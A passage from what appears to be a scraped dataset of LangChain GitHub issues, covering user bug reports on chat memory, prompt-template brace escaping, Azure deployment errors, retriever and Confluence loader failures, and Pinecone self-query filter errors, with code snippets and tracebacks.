Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
please use the following format:
AI: [your response here]
Begin!
Previous conversation history:
{chat_history}
New input: {input}
{agent_scratchpad}"""
print(agent_executor.run("my name is zeyad"))
```
This is the output of the first print statement:
**AI: Hello Zeyad! How can I assist you today?**
`print(agent_executor.run("Do you know my name?"))`
**This is the output of the second print statement (unexpected output); one week ago it was working fine without any problems:**
**AI: As an AI language model, I don't have access to personal information unless you provide it to me. Therefore, I don't know your name unless you tell me. Is there anything specific you would like assistance with?**
### Expected behavior
the expected output for the second statement must be:
AI: Yes, you told me before that your name is Zeyad.
**I really appreciate any help you can provide.** | GPTIndexChatMemory doesn't work as expected with langchain and the agent doesn't use the chat history | https://api.github.com/repos/langchain-ai/langchain/issues/7552/comments | 1 | 2023-07-11T16:38:22Z | 2023-10-17T16:04:55Z | https://github.com/langchain-ai/langchain/issues/7552 | 1,799,329,321 | 7,552 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain: 0.0.230
Python: 3.10
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have a dictionary in Python:
```python
dict = {
"keyfeatures": [
{
"title": "Search for Charitable Activities",
"description": "The system must provide a search function that allows users to enter keywords and returns a list of charitable activities that match those keywords."
},
{
"title": "Display Charitable Activities",
"description": "The system must display the search results in a user-friendly format."
},
{
"title": "Filter and Sort Charitable Activities",
"description": "The system must provide options for users to filter and sort the search results."
},
{
"title": "View Details of a Charitable Activity",
"description": "The system must allow users to select a charitable activity from the search results and view more detailed information about it."
},
{
"title": "Save or Bookmark Charitable Activities",
"description": "The system must allow users to save or bookmark charitable activities that they're interested in."
}
]
}
```
I convert the dictionary into a JSON string:
```python
json_string = json.dumps(dict)
```
and I obtain the following string:
```json
{"keyfeatures": [{"title": "Search for Charitable Activities", "description": "The system must provide a search function that allows users to enter keywords and returns a list of charitable activities that match those keywords."}, {"title": "Display Charitable Activities", "description": "The system must display the search results in a user-friendly format."}, {"title": "Filter and Sort Charitable Activities", "description": "The system must provide options for users to filter and sort the search results."}, {"title": "View Details of a Charitable Activity", "description": "The system must allow users to select a charitable activity from the search results and view more detailed information about it."}, {"title": "Save or Bookmark Charitable Activities", "description": "The system must allow users to save or bookmark charitable activities that they're interested in."}]}
```
If I pass that string to an AIMessagePromptTemplate:
```python
AIMessagePromptTemplate.from_template(json_string)
```
I get the following error:
```text
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/prompts/chat.py", line 85, in from_template
prompt = PromptTemplate.from_template(template, template_format=template_format)
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/prompts/prompt.py", line 145, in from_template
return cls(
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/load/serializable.py", line 74, in __init__
super().__init__(**kwargs)
File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for PromptTemplate
__root__
Invalid prompt schema; check for mismatched or missing input parameters. '"title"' (type=value_error)
```
I have already tried escaping with doubled curly brackets in the f-string format, but it still fails.
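For reference, the escaping I'd expect to work when applied to the already-serialized string (rather than to the dict) — doubled braces are treated as literals by the f-string formatter:

```python
escaped = json_string.replace("{", "{{").replace("}", "}}")
ai_msg = AIMessagePromptTemplate.from_template(escaped)
```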
thanks in advance
### Expected behavior
The prompt template should accept a formatted JSON string without the JSON's curly brackets interfering with the template's variable syntax. | Pass a JSON string and get an error mismatched or missing input parameter | https://api.github.com/repos/langchain-ai/langchain/issues/7551/comments | 3 | 2023-07-11T16:34:25Z | 2023-07-12T00:44:36Z | https://github.com/langchain-ai/langchain/issues/7551 | 1,799,323,572 | 7,551
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.225 also tested with 0.0.229
I can only reproduce it in Azure; I can't reproduce it locally.
### Who can help?
I have a simple python app with streamlit and langchain, I am deploying this to Azure via CI/CD with the following YAML definition
```yaml
stages:
- stage: Build
  displayName: Build stage
  jobs:
  - job: BuildJob
    pool:
      vmImage: $(vmImageName)
    steps:
    - task: UsePythonVersion@0
      inputs:
        versionSpec: '$(pythonVersion)'
      displayName: 'Use Python $(pythonVersion)'
    - script: |
        python -m venv antenv
        source antenv/bin/activate
        python -m pip install --upgrade pip
        pip install setup streamlit
        pip install --target="./.python_packages/lib/site-packages" -r ./requirements.txt
      workingDirectory: $(projectRoot)
      displayName: "Install requirements"
    - task: ArchiveFiles@2
      displayName: 'Archive files'
      inputs:
        rootFolderOrFile: '$(projectRoot)'
        includeRootFolder: false
        archiveType: zip
        archiveFile: $(Build.ArtifactStagingDirectory)/$(Build.BuildId).zip
        replaceExistingArchive: true
    - upload: $(Build.ArtifactStagingDirectory)/$(Build.BuildId).zip
      displayName: 'Upload package'
      artifact: drop

- stage: Deploy
  displayName: 'Deploy Web App'
  dependsOn: Build
  condition: succeeded()
  jobs:
  - deployment: DeploymentJob
    pool:
      vmImage: $(vmImageName)
    environment: $(environmentName)
    strategy:
      runOnce:
        deploy:
          steps:
          - task: UsePythonVersion@0
            inputs:
              versionSpec: '$(pythonVersion)'
            displayName: 'Use Python version'
          - task: AzureAppServiceSettings@1
            displayName: 'Set App Settings'
            inputs:
              azureSubscription: 'AzureAIPocPrincipal'
              appName: 'test'
              resourceGroupName: 'AzureAIPoc'
              appSettings: |
                [
                  {
                    "name": "ENABLE_ORYX_BUILD",
                    "value": 1
                  },
                  {
                    "name": "SCM_DO_BUILD_DURING_DEPLOYMENT",
                    "value": 1
                  },
                  {
                    "name": "POST_BUILD_COMMAND",
                    "value": "pip install -r ./requirements.txt"
                  }
                ]
          - task: AzureWebApp@1
            displayName: 'Deploy Azure Web App : {{ webAppName }}'
            inputs:
              azureSubscription: 'AzureAIPocPrincipal'
              appType: 'webAppLinux'
              deployToSlotOrASE: true
              resourceGroupName: 'AzureAIPoc'
              slotName: 'production'
              appName: 'test'
              package: '$(Pipeline.Workspace)/drop/$(Build.BuildId).zip'
              startUpCommand: 'python -m streamlit run app/home.py --server.port 8000 --server.address 0.0.0.0'
```
My requirements file is:
```text
langchain==0.0.225
streamlit
openai
python-dotenv
pinecone-client
streamlit-chat
chromadb
tiktoken
pymssql
typing-inspect==0.8.0
typing_extensions==4.5.0
```
However I am getting the following error:
```text
TypeError: issubclass() arg 1 must be a class
Traceback:
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/tmp/8db82251b0e58bc/app/pages/xxv0.2.py", line 6, in <module>
import langchain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/agents/__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/agents/agent.py", line 26, in <module>
from langchain.chains.base import Chain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/__init__.py", line 2, in <module>
from langchain.chains.api.base import APIChain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/api/base.py", line 13, in <module>
from langchain.chains.api.prompt import API_RESPONSE_PROMPT, API_URL_PROMPT
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/api/prompt.py", line 2, in <module>
from langchain.prompts.prompt import PromptTemplate
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/__init__.py", line 12, in <module>
from langchain.prompts.example_selector import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/example_selector/__init__.py", line 4, in <module>
from langchain.prompts.example_selector.semantic_similarity import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/example_selector/semantic_similarity.py", line 8, in <module>
from langchain.embeddings.base import Embeddings
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/embeddings/__init__.py", line 29, in <module>
from langchain.embeddings.sagemaker_endpoint import SagemakerEndpointEmbeddings
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/embeddings/sagemaker_endpoint.py", line 7, in <module>
from langchain.llms.sagemaker_endpoint import ContentHandlerBase
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/llms/__init__.py", line 52, in <module>
from langchain.llms.vertexai import VertexAI
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/llms/vertexai.py", line 14, in <module>
from langchain.utilities.vertexai import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/utilities/__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/utilities/apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/document_loaders/__init__.py", line 43, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/document_loaders/embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 539, in prepare
self.populate_validators()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 801, in populate_validators
*(get_validators() if get_validators else list(find_validators(self.type_, self.model_config))),
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/validators.py", line 696, in find_validators
yield make_typeddict_validator(type_, config)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/validators.py", line 585, in make_typeddict_validator
TypedDictModel = create_model_from_typeddict(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/annotated_types.py", line 35, in create_model_from_typeddict
return create_model(typeddict_cls.__name__, **kwargs, **field_definitions)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 972, in create_model
return type(__model_name, __base__, namespace)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 534, in prepare
self._type_analysis()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 638, in _type_analysis
elif issubclass(origin, Tuple): # type: ignore
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/python/3.11.3/lib/python3.11/typing.py", line 1570, in __subclasscheck__
return issubclass(cls, self.__origin__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
```
I am not copying the app script here, as the code works locally; I think it's something related to the Azure App Service environment or the venv setup in the YAML file.
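One thing worth verifying at runtime — a guess on my part: this particular `issubclass() arg 1 must be a class` failure is commonly tied to `typing_extensions`/`typing-inspect` versions under pydantic v1, and the Oryx build might not preserve the pins from requirements.txt. A quick diagnostic:

```python
from importlib.metadata import version

# If these differ from the pinned 4.5.0 / 0.8.0, the pins were not applied.
print(version("typing_extensions"), version("typing-inspect"))
```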
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
n/a
### Expected behavior
code should work :) | TypeError: issubclass() arg 1 must be a class when using langchain in azure | https://api.github.com/repos/langchain-ai/langchain/issues/7548/comments | 23 | 2023-07-11T15:57:23Z | 2024-03-13T07:43:44Z | https://github.com/langchain-ai/langchain/issues/7548 | 1,799,257,114 | 7,548 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.229
I cannot instantiate VespaRetriever (the error says it takes only 1 argument but 4 were given).
Rolling the version back for now.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.retrievers.vespa_retriever import VespaRetriever

vespa_query_body = {
    "yql": 'select * from abstracts where userQuery() or ({targetHits:1}nearestNeighbor(paragraph_embeddings,q))',
    'input.query(q)': 'embed(q)',
    'query': 'q',
    "hits": '3',
    "ranking": "hybrid",
}
vespa_content_field = "paragraph_embeddings"
retriever = VespaRetriever(app=vespa_app, body=vespa_query_body, content_field=vespa_content_field)
```
### Expected behavior
The retriever should instantiate, but it does not. | 0.0.229 VespaRetriver signature broken | https://api.github.com/repos/langchain-ai/langchain/issues/7547/comments | 3 | 2023-07-11T15:41:42Z | 2023-11-01T16:06:35Z | https://github.com/langchain-ai/langchain/issues/7547 | 1,799,224,657 | 7,547
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Accessing many corporate resources requires special authentication, e.g. Kerberos.
The `requests` library supports passing an auth object, e.g.
`requests.get(url, auth=HttpNegotiateAuth(), verify=False)` to use SSPI.
We're able to pass a `requests_wrapper` to `LLMRequestsChain`, but it only allows changing headers, not the actual get method that is used.
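A sketch of the kind of wrapper I mean — subclass the wrapper and thread an auth object through, assuming `LLMRequestsChain` only calls `.get()` (the `my_auth` object stands in for e.g. `HttpNegotiateAuth()`):

```python
import requests
from langchain.requests import TextRequestsWrapper

class AuthRequestsWrapper(TextRequestsWrapper):
    """Route GETs through a requests call that carries an auth object."""

    def get(self, url: str, **kwargs) -> str:
        return requests.get(url, auth=my_auth, headers=self.headers, **kwargs).text
```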
### Suggestion:
Allow more generic wrappers to be passed? Allow passing a requests-compatible auth object? | Issue: Passing auth object to LLMRequestsChain | https://api.github.com/repos/langchain-ai/langchain/issues/7542/comments | 0 | 2023-07-11T13:59:38Z | 2023-07-14T12:38:25Z | https://github.com/langchain-ai/langchain/issues/7542 | 1,799,011,449 | 7,542
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to query documents using the following stack:
**Langchain + embedding tool + vector store + LLM model**
There are many tools and techniques for this in langchain, including **load_qa_chain, RetrievalQA, VectorstoreIndexCreator, ConversationalRetrievalChain**. Those already give good results (though not optimal).
But I found one more technique involving **VectorStoreInfo, VectorStoreToolkit and vectorstore_agent**.
What is the advantage/importance of the pipeline that uses **VectorStoreInfo, VectorStoreToolkit and vectorstore_agent** over one that doesn't (i.e., uses any of **load_qa_chain, RetrievalQA, VectorstoreIndexCreator, ConversationalRetrievalChain**)?
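For reference, the pipeline in question looks roughly like this (`store` and `llm` are placeholders):

```python
from langchain.agents.agent_toolkits import (
    VectorStoreInfo,
    VectorStoreToolkit,
    create_vectorstore_agent,
)

info = VectorStoreInfo(name="docs", description="domain documents", vectorstore=store)
toolkit = VectorStoreToolkit(vectorstore_info=info)
agent = create_vectorstore_agent(llm=llm, toolkit=toolkit, verbose=True)
```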
### Suggestion:
_No response_ | Importance of VectorStoreToolkit, vectorstore_agent and VectorStoreInfo in document based domain specific question answering | https://api.github.com/repos/langchain-ai/langchain/issues/7539/comments | 6 | 2023-07-11T13:06:13Z | 2023-10-23T16:07:02Z | https://github.com/langchain-ai/langchain/issues/7539 | 1,798,902,303 | 7,539 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3.9.12
Langchain 0.0.229
OS Linux Mint 21.1
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am following this tutorial on structured output https://python.langchain.com/docs/modules/model_io/output_parsers/structured
I am passing my OpenAI API key from config and have made sure it is being passed — I can see the output of the `chat_model` instance...
```python
from langchain.output_parsers import StructuredOutputParser, ResponseSchema
from langchain.prompts import PromptTemplate, ChatPromptTemplate, HumanMessagePromptTemplate
from langchain.chat_models import ChatOpenAI
from config import config
response_schemas = [
ResponseSchema(name="answer", description="answer to the user's question"),
ResponseSchema(name="source", description="source used to answer the user's question, should be a website.")
]
output_parser = StructuredOutputParser.from_response_schemas(response_schemas)
format_instructions = output_parser.get_format_instructions()
prompt = PromptTemplate(
template="answer the users question as best as possible.\n{format_instructions}\n{question}",
input_variables=["question"],
partial_variables={"format_instructions": format_instructions}
)
chat_model = ChatOpenAI(temperature=0, openai_api_key=config.OPENAI_API_KEY)
print(chat_model)
prompt = ChatPromptTemplate(
messages=[
HumanMessagePromptTemplate.from_template("answer the users question as best as possible.\n{format_instructions}\n{question}")
],
input_variables=["question"],
partial_variables={"format_instructions": format_instructions}
)
_input = prompt.format_prompt(question="what's the capital of france?")
print(_input.to_messages())
output = chat_model(_input.to_messages())
print(output)
print(output_parser.parse(output.content))
```
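For what it's worth, "Resource not found" usually indicates the client is being routed to an Azure OpenAI endpoint that has no matching deployment; a quick check, assuming stray environment variables are the culprit:

```python
import openai

# If these print Azure-style values, requests go to an Azure endpoint
# with no matching deployment, which yields "Resource not found".
print(openai.api_type, openai.api_base, openai.api_version)
```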
### Expected behavior
The expected output of the code should be
```json
{'answer': 'Paris', 'source': 'https://en.wikipedia.org/wiki/Paris'}
``` | openai.error.InvalidRequestError: Resource not found | https://api.github.com/repos/langchain-ai/langchain/issues/7536/comments | 3 | 2023-07-11T12:23:21Z | 2023-10-17T16:05:04Z | https://github.com/langchain-ai/langchain/issues/7536 | 1,798,820,813 | 7,536 |
[
"hwchase17",
"langchain"
]
| ### Feature request
The SQL agent should query in a manner that gets **unique** values as sample data (metadata) instead of arbitrary values. Only then will it be able to understand which columns to query. Otherwise, it might get confused between similar-sounding column names (e.g., age, age_group).
### Motivation
Databases are typically very sparse (several columns are null). In such cases, the SQL agent performs poorly. The reason is that it uses the InfoSQLDatabaseTool (sql_db_schema) to get sample rows from the database; if those values are themselves null, it doesn't get an accurate idea of what each column is supposed to contain. This affects both query generation and query checking.
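A sketch of the kind of sampling I mean (the table and column names are placeholders):

```python
# DISTINCT + NOT NULL sampling surfaces representative values even in sparse tables.
sample = db.run(
    "SELECT DISTINCT age_group FROM patients "
    "WHERE age_group IS NOT NULL LIMIT 3"
)
```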
### Your contribution
I'm not so sure as of now. | Support for sparse tables | https://api.github.com/repos/langchain-ai/langchain/issues/7535/comments | 1 | 2023-07-11T12:18:49Z | 2023-10-17T16:05:09Z | https://github.com/langchain-ai/langchain/issues/7535 | 1,798,812,094 | 7,535 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os
import openai
import pinecone
from langchain.document_loaders import DirectoryLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Pinecone
from langchain.llms import OpenAI
from langchain.chains.question_answering import load_qa_chain
directory = '/content/data'
def load_docs(directory):
loader = DirectoryLoader(directory)
documents = loader.load()
return documents
documents = load_docs(directory)
def split_docs(documents, chunk_size=1000, chunk_overlap=20):
text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)
docs = text_splitter.split_documents(documents)
return docs
docs = split_docs(documents)
embeddings = OpenAIEmbeddings(model_name="ada")
pinecone.init(
api_key="pinecone api key",
environment="env"
)
index_name = "langchain-demo"
index = Pinecone.from_documents(docs, embeddings, index_name=index_name)
model_name = "gpt-4"
llm = OpenAI(model_name=model_name)
chain = load_qa_chain(llm, chain_type="stuff")
def get_similiar_docs(query, k=2, score=False):
if score:
similar_docs = index.similarity_search_with_score(query, k=k)
else:
similar_docs = index.similarity_search(query, k=k)
return similar_docs
def get_answer(query):
similar_docs = get_similiar_docs(query)
answer = chain.run(input_documents=similar_docs, question=query)
return answer
```
In the above code, if I ask any question, it is answered from outside knowledge rather than from the document corpus.
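A sketch of the mitigation I'd expect to need — constrain the QA prompt so the model must answer only from the retrieved context (the wording of the template is mine):

```python
from langchain.prompts import PromptTemplate

template = (
    "Answer only from the context below. If the answer is not in the "
    "context, say \"I don't know.\"\n\n"
    "Context:\n{context}\n\nQuestion: {question}"
)
chain = load_qa_chain(
    llm,
    chain_type="stuff",
    prompt=PromptTemplate(template=template, input_variables=["context", "question"]),
)
```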
### Expected behavior
If I ask any domain-specific query, it should be answered based only on the embedded document corpus; I am not expecting any out-of-domain answer.
If the query is not related to the embedded document store, then it shouldn't answer at all, instead of generating an answer from the model's own pretrained knowledge. | Generating answers from LLM's pretrianed knowledge base, instead of from the embedded document. | https://api.github.com/repos/langchain-ai/langchain/issues/7532/comments | 6 | 2023-07-11T11:35:56Z | 2023-11-10T16:08:12Z | https://github.com/langchain-ai/langchain/issues/7532 | 1,798,735,631 | 7,532
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to integrate Confluence for OpenAI embeddings and a vector store using the in-memory DocArray.
I am sure this is not a Langchain issue, but I thought of posting here; any pointer would be really appreciated.
I created a free trial account with atlassian.com and am trying a POC with Confluence pages.
```python
from langchain.document_loaders import ConfluenceLoader

loader = ConfluenceLoader(url="https://yogeshdeshmukh.atlassian.net/wiki",
                          token="XXXX")
documentLoaders = documentLoaders + loader.load(space_key="YYYY", include_attachments=False, limit=10)
```
As per the logs, it calls:
```
https://yogeshdeshmukh.atlassian.net:443 "GET /wiki/rest/api/content?spaceKey=~YYYY&limit=10&status=current&expand=body.storage&type=page HTTP/1.1" 403 None
DEBUG:atlassian.rest_client:HTTP: GET rest/api/content -> 403 Forbidden
DEBUG:atlassian.rest_client:HTTP: Response text -> {"error": "Failed to parse Connect Session Auth Token"}
ERROR:atlassian.confluence:'message'
Traceback (most recent call last):
  File "/Users/ydeshmukh/Library/Python/3.9/lib/python/site-packages/atlassian/confluence.py", line 3122, in raise_for_status
    error_msg = j["message"]
```
Any idea if I need to provide some additional parameters? I first tried with a password, but it was failing; later I came to know that password-based basic auth is deprecated, so I registered for a token, but that is also failing.
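For Atlassian Cloud, authentication appears to require the account email plus an API token passed as `username`/`api_key` (the `token` argument is for server/Data Center personal access tokens). A sketch under that assumption:

```python
from langchain.document_loaders import ConfluenceLoader

loader = ConfluenceLoader(
    url="https://yogeshdeshmukh.atlassian.net/wiki",
    username="you@example.com",  # hypothetical account email
    api_key="XXXX",              # API token created at id.atlassian.com
)
docs = loader.load(space_key="YYYY", include_attachments=False, limit=10)
```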
### Suggestion:
_No response_ | Issue: ConfluenceLoader 403 Forbidden Failed to parse Connect Session Auth Token | https://api.github.com/repos/langchain-ai/langchain/issues/7531/comments | 3 | 2023-07-11T11:29:58Z | 2023-07-12T06:21:31Z | https://github.com/langchain-ai/langchain/issues/7531 | 1,798,725,077 | 7,531 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.0.228
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code to reproduce:
```
embeddings = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME,
model=OPENAI_EMBEDDING_MODEL_NAME,
chunk_size=1)
# create new index
#pinecone.create_index("langchain-self-retriever-demo", dimension=1536)
vectorstore = Pinecone.from_existing_index(index_name="cubigo", embedding=embeddings, namespace="vwProfilesMetadata")
metadata_field_info = [
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string",
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident or the date the resident was born",
type="Date"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident or the place the resident was born",
type="string"
),
AttributeInfo(
name="Hometown",
description="The town or city where the resident grew up",
type="string"
)
]
document_content_description = "The content of the document describes " \
"a resident of the facility, each document is a resident and it " \
"has all the information about the resident like FirstName," \
"LastName, RoleName, Gender, PhoneNumber, CellPhoneNumber, Address, " \
"Birthdate, Birthplace, Hometown, Education, CollegeName, PastOccupations, " \
"Veteran, NameOfSpouse, ReligiousPreferences, SpokenLanguages, " \
"ActiveLiveDescription, RetiredLiveDescription, Accomplishments, AnniversaryDate, " \
"YourTypicalDay, TalentsAndHobbies, InterestCategories, OtherInterestCategories," \
"FavoriteActor, FavoriteActress, FavoriteAnimal, FavoriteArtist, FavoriteAuthor, " \
"FavoriteBandMusicalArtist, FavoriteBook, FavoriteClimate, FavoriteColor, FavoriteCuisine, " \
"FavoriteDance, FavoriteDessert, FavoriteDrink, FavoriteFood, FavoriteFruit, FavoriteFutureTravelDestination, " \
"FavoriteGame, FavoriteMovie, FavoritePastTravelDestination, FavoriteSeasonOfTheYear, FavoriteSong, FavoriteSport, " \
"FavoriteSportsTeam, FavoriteTvShow, FavoriteVegetable"
user_input = get_text()
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
retriever = SelfQueryRetriever.from_llm(
llm, vectorstore, document_content_description, metadata_field_info, verbose=True, enable_limit=True
)
#response = retriever.get_relevant_documents(user_input)
chain = RetrievalQAWithSourcesChain.from_chain_type(llm=llm,
chain_type="stuff",
retriever=retriever,
return_source_documents=True)
if user_input:
response = chain({"question": user_input})
```
Exception:
```
ApiException: (400) Reason: Bad Request HTTP response headers: HTTPHeaderDict({'content-type': 'application/json', 'date': 'Tue, 11 Jul 2023 11:04:33 GMT', 'x-envoy-upstream-service-time': '0', 'content-length': '68', 'server': 'envoy'}) HTTP response body: {"code":3,"message":"$contain is not a valid operator","details":[]}
```
The question I am asking: "Who is interested in baking?"
If I instead ask "Who likes baking?", there are no errors.
### Expected behavior
Should get a clear response or no answer. | $contain is not a valid operator in SelfQueryRetrieval | https://api.github.com/repos/langchain-ai/langchain/issues/7529/comments | 6 | 2023-07-11T11:07:41Z | 2024-03-22T18:02:58Z | https://github.com/langchain-ai/langchain/issues/7529 | 1,798,689,044 | 7,529 |
[
"hwchase17",
"langchain"
]
| ### Using Open source LLM models in SQL Chain
Is it possible to use open-source LLM models in SQL Chain?
I have tried using TAPEX/Flan models in SQL Chain, but I'm getting a serialization error on dict classes.
Error:
```
File "pydantic\main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for SQLDatabaseChain
__root__ -> llm
